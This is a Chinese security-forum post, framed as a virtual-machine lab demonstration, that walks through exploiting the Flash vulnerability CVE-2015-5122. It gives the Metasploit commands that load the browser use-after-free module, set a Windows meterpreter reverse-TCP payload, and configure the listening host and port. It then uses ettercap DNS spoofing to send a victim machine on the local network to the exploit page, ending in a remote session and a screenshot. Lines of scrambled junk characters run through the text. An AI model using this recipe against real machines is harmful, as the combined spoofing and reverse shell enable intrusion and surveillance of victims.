找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1543|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, k' Y! P! M1 T- l 二、cve2015-5122漏洞实例演示虚拟机 & K- [* I8 H8 x

8 |2 e! z; ?( l

3 W' A" h1 |( N T9 s) d1 H+ k   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 1 l4 R9 z. Q. o, t% B

6 l8 h; T9 ?3 F# |7 K1 u

( ~: ~$ B$ _' j- P& v search cve-2015-5122如图: # p$ [) O# o7 {

U! w6 l4 {. O6 T8 ~

; w* Q& ], }* y7 I N0 _- T$ j5 B$ C3 N   2 K4 A0 K" @1 W' O1 h/ x

# F# \9 ?7 a( F- N) `: o5 v

" s" E: D6 i- h2 J3 x! E* Q 下面我们敲如下命令: 0 `# V' F* W: S1 u

5 R' v1 S9 B0 {% Z0 O

E$ |8 W6 i6 U$ ?4 e% }* x use exploit/multi/browser/adobe_flash_opaque_background_uaf , z; [* [+ W7 S! x# G

/ y; \5 t$ `" v& ]! H

7 k4 a( o; s" Y) p" V8 d% T set PAYLOAD windows/meterpreter/reverse_tcp 9 l5 o2 f- }* {# c

7 T1 F' X8 X# K" w

! [* N$ `2 L: D6 N1 C# _3 ~( _ set LHOST 192.168.0.109 4 s8 h7 U$ v X9 E# P

7 X% U% ?' b, |8 U/ B4 L

# f: ?2 n/ b2 _! q2 `! \ set URIPATH /                        /*根目录*/ 1 ?* B$ Q( ~7 i; }/ {4 ~0 z

$ M& Y. N! [1 z/ Z* ]% }# f2 f

) Y0 {& h! {+ w& z! T set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 1 A5 ?: W7 b" J- f" i0 f

9 \" i* ]4 L8 y; n: s( ?

; o, I$ x8 S" T \# n set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! n0 u* F9 u, M3 e9 m- {% @# o% U

( x+ s9 R' J9 p

3 w2 k/ Z' X: I/ \7 f 然后show options如图: 4 h; f5 Y" C+ Y; N

2 r" P5 V5 P7 Y% T; a2 h

, z* n" {' u7 X$ G   4 o8 P; o% H. q5 O7 J

. `% @ y$ M. M; S `8 I4 f. A6 F

, M# C. ]6 w* A+ q. g7 b 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
# C6 m7 a: P3 z- H# M& B9 w5 s
: ~4 l! ]" ^- F0 e8 B/ i

6 R" y8 p- |! ~! s

9 e" P1 Q) @/ p$ Z% x R& ]+ y' h 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 1 |) A! X: ]% K2 F6 q1 v$ i" l5 b

7 _& X6 \* h0 P2 b8 U3 X

; l3 T* ?6 {: z# E. c Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 l2 B0 G/ L4 O7 {! ?7 D

6 {! M4 ?$ N$ x- A9 q2 K. N

! Z" W& t( g' E8 t   5 W$ w& R1 B) @5 }% V, D

4 L! X( @7 ]' w8 W

* S5 E' i/ H) k' F: u 成功了,这时候我们断开ettercap,如图: 7 u7 O& y' n4 y- L0 m8 |4 n

8 y- {9 }( G1 F* e5 M1 O

# C( O/ J/ O* d" @   * y. U4 V/ P" d7 p8 e: N8 K/ v

4 X9 f* N% v5 ?' i; e( i( w

. S" ^! q8 a$ s2 j, m Screenshot如图: 4 H# F+ A0 ^5 T& `3 Z7 w1 P

8 \# J. H3 ~. F

' A. t3 [2 p8 X: `2 M5 N4 S3 x7 ^   + v5 ]$ m: b# H: e" `

) G+ a+ L- i' E( Y

) [9 r, I$ w* w, G % i9 i/ [' X2 s. e9 S$ h% R

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表